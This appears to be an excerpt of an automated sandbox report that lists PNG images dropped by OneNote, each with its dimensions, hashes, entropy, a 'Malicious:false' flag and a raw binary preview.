                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
